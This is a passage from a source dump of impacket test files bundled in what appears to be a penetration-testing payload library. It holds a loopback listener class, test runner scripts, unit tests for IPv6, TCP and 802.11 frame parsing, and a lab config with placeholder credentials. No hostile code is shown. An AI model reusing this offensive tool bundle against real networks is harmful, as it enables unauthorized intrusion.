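    """One loopback TCP listener per instance.

    Each instance takes the next port from the module-level counter, so
    several instances can exist side by side without colliding.
    """
    def __init__(self):
        global port
        self.port = port
        #Increase the default port for the next attack
        port += 1

    def listen(self):
        """Block until one client connects to 127.0.0.1:self.port.

        Leaves the accepted connection in self.connection and a file object
        over it in self.socketfile.  The listening socket is closed as soon
        as the client is accepted (or bind/listen fail): it is never reused,
        and leaving it open kept the port bound for the life of the process.
        """
        #Set up the listening socket
        serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            #Bind on localhost
            serversocket.bind(('127.0.0.1', self.port))
            #Dont allow a backlog
            serversocket.listen(0)
            self.connection, host = serversocket.accept()
        finally:
            serversocket.close()
        #Create a file object from the socket
        self.socketfile = self.connection.makefile()
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/krb5/__init__.py:
# --------------------------------------------------------------------------------
pass
# --------------------------------------------------------------------------------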
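# /payloads/library/tools_installer/tools_to_install/impacket/impacket/ldap/__init__.py:
# --------------------------------------------------------------------------------
pass
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/__init__.py:
# --------------------------------------------------------------------------------
pass
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.bat:
# --------------------------------------------------------------------------------

FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.sh:
# --------------------------------------------------------------------------------
#!/bin/bash
# Run every test module in this directory and print an OK/FAILED tally.
# Each module runs with the package root on PYTHONPATH; its output is echoed
# to stderr line by line and its last line (unittest's "OK" or "FAILED (...)"
# summary) decides how the module is counted.
separator='======================================================================'
#ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}"
#ls *.py | xargs --max-args=1 python

export PYTHONPATH=../../..:$PYTHONPATH

total=0
ok=0
failed=0
# Glob instead of parsing `ls` output: names with spaces or glob characters
# stay intact, and a directory without .py files leaves the pattern
# unexpanded, which the -e test skips.
for file in *.py ; do
    [ -e "$file" ] || continue
    echo "$separator"
    echo "Executing $file"
    latest=$(
        python "$file" 2>&1 | {
            # -r keeps backslashes in the test output literal.
            while read -r line; do
                echo " $line" 1>&2
                latest="$line"
            done
            echo "$latest"
        }
    )
    #echo Latest ${latest}
    result=${latest:0:6}
    if [ "$result" = "FAILED" ]
    then
        (( failed++ ))
    elif [ "$result" = "OK" ]
    then
        (( ok++ ))
    else
        # A module that died before unittest could report (import or syntax
        # error) prints neither marker; count it as failed instead of letting
        # it vanish from both tallies.
        echo "WARNING: Unknown result!!!!!"
        (( failed++ ))
    fi

    (( total++ ))
done
echo "$separator"
echo Summary:
echo " OK $ok/$total"
echo " $failed FAILED"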
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/test_IP6.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

#Impact test version
# Both import attempts use a bare except, so a failing import is silent;
# if neither succeeds the names are simply undefined and the tests below
# fail with NameError.
try:
    from impacket import IP6_Address, IP6, ImpactDecoder
except:
    pass

#Standalone test version
# "../.." is relative to the current working directory, not to this file.
try:
    import sys
    sys.path.insert(0,"../..")
    import IP6_Address, IP6, ImpactDecoder
except:
    pass

import unittest

class TestIP6(unittest.TestCase):
    """Round-trip test of one IPv6 header: decode a fixed 40-byte header
    and check every field, then build the same header and compare bytes."""

    def setUp(self):
        #Version 6, traffic class 72, flow label 148997, payload length 1500
        #next header 17 (UDP), hop limit 1
        #source addr FE80::78F8:89D1:30FF:256B
        #dest addr FF02::1:3
        # Kept as a list of ints (not a str) because test_creation compares
        # against get_bytes().tolist().
        self.binary_packet = [
            0x64, 0x82, 0x46, 0x05,
            0x05, 0xdc, 0x11, 0x01,
            0xfe, 0x80, 0x00, 0x00,
            0x00, 0x00, 0x00, 0x00,
            0x78, 0xf8, 0x89, 0xd1,
            0x30, 0xff, 0x25, 0x6b,
            0xff, 0x02, 0x00, 0x00,
            0x00, 0x00, 0x00, 0x00,
            0x00, 0x00, 0x00, 0x00,
            0x00, 0x01, 0x00, 0x03]

    def test_decoding(self):
        '''Test IP6 Packet decoding.'''


        d = ImpactDecoder.IP6Decoder()
        parsed_packet = d.decode(self.binary_packet)

        protocol_version = parsed_packet.get_ip_v()
        traffic_class = parsed_packet.get_traffic_class()
        flow_label = parsed_packet.get_flow_label()
        payload_length = parsed_packet.get_payload_length()
        next_header = parsed_packet.get_next_header()
        hop_limit = parsed_packet.get_hop_limit()
        source_address = parsed_packet.get_ip_src()
        destination_address = parsed_packet.get_ip_dst()

        # assertEquals is the deprecated alias of assertEqual.
        self.assertEquals(protocol_version, 6, "IP6 parsing - Incorrect protocol version")
        self.assertEquals(traffic_class, 72, "IP6 parsing - Incorrect traffic class")
        self.assertEquals(flow_label, 148997, "IP6 parsing - Incorrect flow label")
        self.assertEquals(payload_length, 1500, "IP6 parsing - Incorrect payload length")
        self.assertEquals(next_header, 17, "IP6 parsing - Incorrect next header")
        self.assertEquals(hop_limit, 1, "IP6 parsing - Incorrect hop limit")
        self.assertEquals(source_address.as_string(), "FE80::78F8:89D1:30FF:256B", "IP6 parsing - Incorrect source address")
        self.assertEquals(destination_address.as_string(), "FF02::1:3", "IP6 parsing - Incorrect destination address")

    def test_creation(self):
        '''Test IP6 Packet creation.'''

        crafted_packet = IP6.IP6()
        crafted_packet.set_traffic_class(72)
        crafted_packet.set_flow_label(148997)
        crafted_packet.set_payload_length(1500)
        crafted_packet.set_next_header(17)
        crafted_packet.set_hop_limit(1)
        crafted_packet.set_ip_src("FE80::78F8:89D1:30FF:256B")
        crafted_packet.set_ip_dst("FF02::1:3")
        crafted_buffer = crafted_packet.get_bytes().tolist()
        self.assertEquals(crafted_buffer, self.binary_packet, "IP6 creation - Buffer mismatch")


# Runs at import time (no __main__ guard), so importing this module from
# elsewhere executes the suite.
suite = unittest.TestLoader().loadTestsFromTestCase(TestIP6)
unittest.TextTestRunner(verbosity=2).run(suite)

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/test_TCP_bug_issue7.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

# sorry, this is very ugly, but I'm in python 2.5
import sys
sys.path.insert(0,"../..")

from ImpactPacket import TCP, ImpactPacketException
from binascii import hexlify
import unittest
from threading import Thread

class TestTCP(unittest.TestCase):
    """Regression test: parsing a TCP header whose options carry a zero
    length must raise (or at least return) instead of looping forever."""

    def setUp(self):
        # Dummy TCP header with "Maximum Segment Size" Option and zero length
        # self.frame itself is not used by test_01, which rebuilds the same
        # bytes inline.
        self.frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00'

    def test_01(self):
        'Test TCP options parsing hangs'
        # The parse runs in a daemon thread so a hang cannot block the test
        # run; the assertion is only that the thread finished within 1s.
        class it_hangs(Thread):
            def __init__(self):
                Thread.__init__(self)
            def run(self):
                try:
                    frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00' \
                            '\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00'
                    tcp = TCP(frame)
                #except Exception,e:
                #    print "aaaaaaaaaaaaaaa"
                #    print e
                #except Exception,e:
                except ImpactPacketException,e:
                    # The expected outcome is exactly this error message;
                    # any other ImpactPacketException is re-raised (in the
                    # thread, so it only shows up on stderr, not as a
                    # test failure).
                    if str(e) != "'TCP Option length is too low'":
                        raise e
                except:
                    # Any other exception is swallowed: the test only
                    # distinguishes "returned" from "hung".
                    pass

        thread_hangs = it_hangs()
        thread_hangs.setDaemon(True)
        thread_hangs.start()
        thread_hangs.join(1.0) # 1 seconds timeout
        self.assertEqual(thread_hangs.isAlive(), False)
        #if thread_hang.isAlive():


# Runs at import time (no __main__ guard).
suite = unittest.TestLoader().loadTestsFromTestCase(TestTCP)
unittest.TextTestRunner(verbosity=2).run(suite)

# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/__init__.py:
# --------------------------------------------------------------------------------
pass
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/dcetests.cfg:
# --------------------------------------------------------------------------------
# Lab target settings read by the SMB_RPC test cases (e.g. test_nmb.py reads
# the [SMBTransport] section); servername must be filled in for those tests.
# The username/password here are throwaway test values for a disposable host.
[global]

[TCPTransport]
servername =
machine = 172.16.123.232
username = test
password = test
hashes =
aesKey256 =
aesKey128 =
domain =
[SMBTransport]
servername =
machine = 172.16.123.232
username = test
password = test
hashes =
aesKey256 =
aesKey128 =
domain =

# --------------------------------------------------------------------------------
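# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/rundce.sh:
# --------------------------------------------------------------------------------
#!/bin/bash
separator='======================================================================'
#ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}"
#ls *.py | xargs --max-args=1 python

export PYTHONPATH=../../..:$PYTHONPATH

python test_rpcrt.py
python test_scmr.py
python test_epm.py
python test_samr.py
python test_wkst.py
python test_srvs.py
python test_lsad.py
python test_lsat.py
python test_rrp.py
python test_mgmt.py
python test_ndr.py
python test_drsuapi.py
python test_wmi.py
python test_dcomrt.py
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/test_nmb.py:
# --------------------------------------------------------------------------------
import ConfigParser
import unittest

from impacket import nmb


class NMBTests(unittest.TestCase):
    """NetBIOS name-service checks against the lab host configured in
    dcetests.cfg. Subclasses provide self.serverName and self.machine in
    setUp(); most tests only print what the server answered."""
    def create_connection(self):
        pass

    def test_getnetbiosname(self):
        n = nmb.NetBIOS()
        res = n.getnetbiosname(self.machine)
        print(repr(res))
        # Was assertTrue(self.serverName, res): that only checked that
        # serverName is non-empty and used res as the failure message, so a
        # wrong name could never fail. Compare the two names instead; the
        # configured servername must match the case the server reports.
        self.assertEqual(self.serverName, res)

    def test_getnodestatus(self):
        n = nmb.NetBIOS()
        resp = n.getnodestatus(self.serverName.upper(), self.machine)
        print(resp)

    def test_gethostbyname(self):
        n = nmb.NetBIOS()
        n.set_nameserver(self.serverName)
        resp = n.gethostbyname(self.serverName, nmb.TYPE_SERVER)
        print(resp.entries)

    def test_name_registration_request(self):
        n = nmb.NetBIOS()
        # ToDo: Look at this
        #resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1')
        resp = n.name_registration_request('*JSMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_ONT_P, '1.1.1.2')
        resp.dump()

    def test_name_query_request(self):
        n = nmb.NetBIOS()
        # ToDo: Look at this
        # resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1')
        resp = n.name_query_request(self.serverName, self.machine)
        print(resp.entries)

class NetBIOSTests(NMBTests):
    def setUp(self):
        NMBTests.setUp(self)
        # Put specific configuration for target machine with SMB1
        # dcetests.cfg is resolved against the current working directory.
        configFile = ConfigParser.ConfigParser()
        configFile.read('dcetests.cfg')
        self.serverName = configFile.get('SMBTransport', 'servername')
        self.machine = configFile.get('SMBTransport', 'machine')

if __name__ == "__main__":
    suite = unittest.TestLoader().loadTestsFromTestCase(NetBIOSTests)
    unittest.TextTestRunner(verbosity=1).run(suite)
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/__init__.py:
# --------------------------------------------------------------------------------
pass
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.bat:
# --------------------------------------------------------------------------------

FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.sh:
# --------------------------------------------------------------------------------
#!/bin/bash
# Run every test module in this directory and print an OK/FAILED tally; the
# last output line of each module (unittest's summary) decides how it counts.
separator='======================================================================'
#ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}"
#ls *.py | xargs --max-args=1 python

export PYTHONPATH=../../..:$PYTHONPATH

total=0
ok=0
failed=0
# Glob instead of parsing `ls`: names with spaces stay intact and an
# unexpanded pattern (no .py files) is skipped by the -e test.
for file in *.py ; do
    [ -e "$file" ] || continue
    echo "$separator"
    echo "Executing $file"
    latest=$(
        python "$file" 2>&1 | {
            while read -r line; do
                echo " $line" 1>&2
                latest="$line"
            done
            echo "$latest"
        }
    )
    #echo Latest ${latest}
    result=${latest:0:6}
    if [ "$result" = "FAILED" ]
    then
        (( failed++ ))
    elif [ "$result" = "OK" ]
    then
        (( ok++ ))
    else
        echo "WARNING: Unknown result!!!!!"
        (( failed++ ))
    fi

    (( total++ ))
done
echo "$separator"
echo Summary:
echo " OK $ok/$total"
echo " $failed FAILED"
# --------------------------------------------------------------------------------
# /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_Dot11Decoder.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

# sorry, this is very ugly, but I'm in python 2.5
import sys
sys.path.insert(0,"../..")

from ImpactDecoder import Dot11Decoder #,Dot11Types
from binascii import hexlify
import unittest

class TestDot11Decoder(unittest.TestCase):

    def setUp(self):
        self.WEPKey=None #Unknown
        self.WEPData='\x08\x41\x3a\x01\x00\x17\x3f\x44\x4f\x96\x00\x13\xce\x67\x0e\x73\x00\x17\x3f\x44\x4f\x96\xb0\x04\xeb\xcd\x8b\x00\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17\xdd\xb5\xd4\x35'
        dot11_decoder = Dot11Decoder()
        self.in0=dot11_decoder.decode(self.WEPData)
        self.in1=self.in0.child()
        self.in2=self.in1.child()
        self.in3=self.in2.child()
        if self.WEPKey:
            self.in4=self.in3.child()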
| self.in5=self.in4.child() 24 | 25 | def test_01_Dot11Decoder(self): 26 | 'Test Dot11 decoder' 27 | self.assertEqual(str(self.in0.__class__), "dot11.Dot11") 28 | 29 | def test_02_Dot11DataFrameDecoder(self): 30 | 'Test Dot11DataFrame decoder' 31 | self.assertEqual(str(self.in1.__class__), "dot11.Dot11DataFrame") 32 | 33 | def test_03_Dot11WEP(self): 34 | 'Test Dot11WEP decoder' 35 | self.assertEqual(str(self.in2.__class__), "dot11.Dot11WEP") 36 | 37 | def test_04_Dot11WEPData(self): 38 | 'Test Dot11WEPData decoder' 39 | 40 | if not self.WEPKey: 41 | return 42 | 43 | self.assertEqual(str(self.in3.__class__), "dot11.Dot11WEPData") 44 | 45 | # Test if wep data "get_packet" is correct 46 | wepdata='\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17' 47 | self.assertEqual(self.in3.get_packet(),wepdata) 48 | 49 | def test_05_LLC(self): 50 | 'Test LLC decoder' 51 | if self.WEPKey: 52 | self.assertEqual(str(self.in4.__class__), "dot11.LLC") 53 | 54 | def test_06_Data(self): 55 | 'Test LLC Data decoder' 56 | 57 | if self.WEPKey: 58 | dataclass=self.in4.__class__ 59 | else: 60 | dataclass=self.in3.__class__ 61 | 62 | self.assertTrue(str(dataclass).find('ImpactPacket.Data') > 0) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11Decoder) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameACK 8 | from binascii import hexlify 9 | import 
unittest 10 | 11 | class TestDot11FrameControlACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame ACK 15 | self.frame_orig='\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT) 27 | 28 | self.ack = Dot11ControlFrameACK(d.get_body_as_string()) 29 | 30 | d.contains(self.ack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.ack.get_header_size(), 8) 35 | self.assertEqual(self.ack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.ack.get_duration(), 0) 41 | self.ack.set_duration(0x1234) 42 | self.assertEqual(self.ack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.ack.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.ack.set_ra(ra) 52 | self.assertEqual(self.ack.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlACK) 55 | unittest.TextTestRunner(verbosity=2).run(suite) 56 | 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEnd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEnd 8 | from 
binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCFEnd(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CFEnd 15 | self.frame_orig='\xe4\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x19\xe0\x98\x04\xd4\xad\x9c\x3c\xc0' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END) 27 | 28 | self.cfend = Dot11ControlFrameCFEnd(d.get_body_as_string()) 29 | 30 | d.contains(self.cfend) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cfend.get_header_size(), 14) 35 | self.assertEqual(self.cfend.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cfend.get_duration(), 0x00) 41 | self.cfend.set_duration(0x1234) 42 | self.assertEqual(self.cfend.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cfend.get_ra() 48 | self.assertEqual(ra.tolist(), [0xff,0xff,0xff,0xff,0xff,0xff]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.cfend.set_ra(ra) 52 | self.assertEqual(self.cfend.get_ra().tolist(), [0x12,0xff,0xff,0xff,0xff,0x34]) 53 | 54 | def test_04_BSSID(self): 55 | 'Test BSS ID field' 56 | 57 | bssid=self.cfend.get_bssid() 58 | self.assertEqual(bssid.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4]) 59 | bssid[0]=0x12 60 | bssid[5]=0x34 61 | self.cfend.set_bssid(bssid) 62 | self.assertEqual(self.cfend.get_bssid().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEnd) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | 
-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEndCFACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEndCFACK 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCFEndCFACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CFEndCFACK 15 | self.frame_orig='\xf4\x74\xde\xed\xe5\x56\x85\xf8\xd2\x3b\x96\xae\x0f\xb0\xd9\x8a\x03\x02\x38\x00' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK) 27 | 28 | self.cfendcfack = Dot11ControlFrameCFEndCFACK(d.get_body_as_string()) 29 | 30 | d.contains(self.cfendcfack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cfendcfack.get_header_size(), 14) 35 | self.assertEqual(self.cfendcfack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cfendcfack.get_duration(), 0xEDDE) 41 | self.cfendcfack.set_duration(0x1234) 42 | self.assertEqual(self.cfendcfack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cfendcfack.get_ra() 48 | self.assertEqual(ra.tolist(), [0xe5,0x56,0x85,0xf8,0xd2,0x3b]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.cfendcfack.set_ra(ra) 52 | self.assertEqual(self.cfendcfack.get_ra().tolist(), 
[0x12,0x56,0x85,0xf8,0xd2,0x34]) 53 | 54 | def test_04_BSSID(self): 55 | 'Test BSS ID field' 56 | 57 | bssid=self.cfendcfack.get_bssid() 58 | self.assertEqual(bssid.tolist(), [0x96,0xae,0x0f,0xb0,0xd9,0x8a]) 59 | bssid[0]=0x12 60 | bssid[5]=0x34 61 | self.cfendcfack.set_bssid(bssid) 62 | self.assertEqual(self.cfendcfack.get_bssid().tolist(), [0x12,0xae,0x0f,0xb0,0xd9,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEndCFACK) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CTS 15 | self.frame_orig='\xc4\x00\x3b\x12\x00\x19\xe0\x98\x04\xd4\x2b\x8a\x65\x17' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND) 27 | 28 | self.cts = Dot11ControlFrameCTS(d.get_body_as_string()) 29 | 30 | d.contains(self.cts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cts.get_header_size(), 8) 35 | self.assertEqual(self.cts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | 
self.assertEqual(self.cts.get_duration(), 4667) 41 | self.cts.set_duration(0x1234) 42 | self.assertEqual(self.cts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cts.get_ra() 48 | 49 | self.assertEqual(ra.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4]) 50 | ra[0]=0x12 51 | ra[5]=0x34 52 | self.cts.set_ra(ra) 53 | self.assertEqual(self.cts.get_ra().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34]) 54 | 55 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCTS) 56 | unittest.TextTestRunner(verbosity=2).run(suite) 57 | 58 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlPSPoll.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFramePSPoll 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlPSPoll(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame PSPoll 15 | self.frame_orig='\xa6\x73\xf1\xaf\x48\x06\xee\x23\x2b\xc9\xfe\xbe\xe5\x05\x4c\x0a\x04\xa0\x00\x0f' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL) 27 | 28 | self.pspoll = Dot11ControlFramePSPoll(d.get_body_as_string()) 29 | 30 | d.contains(self.pspoll) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.pspoll.get_header_size(), 14) 35 | 
self.assertEqual(self.pspoll.get_tail_size(), 0) 36 | 37 | def test_02_AID(self): 38 | 'Test AID field' 39 | 40 | self.assertEqual(self.pspoll.get_aid(), 0xAFF1) 41 | self.pspoll.set_aid(0x1234) 42 | self.assertEqual(self.pspoll.get_aid(), 0x1234) 43 | 44 | def test_03_BSSID(self): 45 | 'Test BSS ID field' 46 | 47 | bssid=self.pspoll.get_bssid() 48 | self.assertEqual(bssid.tolist(), [0x48,0x06,0xee,0x23,0x2b,0xc9]) 49 | bssid[0]=0x12 50 | bssid[5]=0x34 51 | self.pspoll.set_bssid(bssid) 52 | self.assertEqual(self.pspoll.get_bssid().tolist(), [0x12,0x06,0xee,0x23,0x2b,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.pspoll.get_ta() 58 | self.assertEqual(ta.tolist(), [0xfe,0xbe,0xe5,0x05,0x4c,0x0a]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.pspoll.set_ta(ta) 62 | self.assertEqual(self.pspoll.get_ta().tolist(), [0x12,0xbe,0xe5,0x05,0x4c,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlPSPoll) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlRTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameRTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlRTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame RTS 15 | 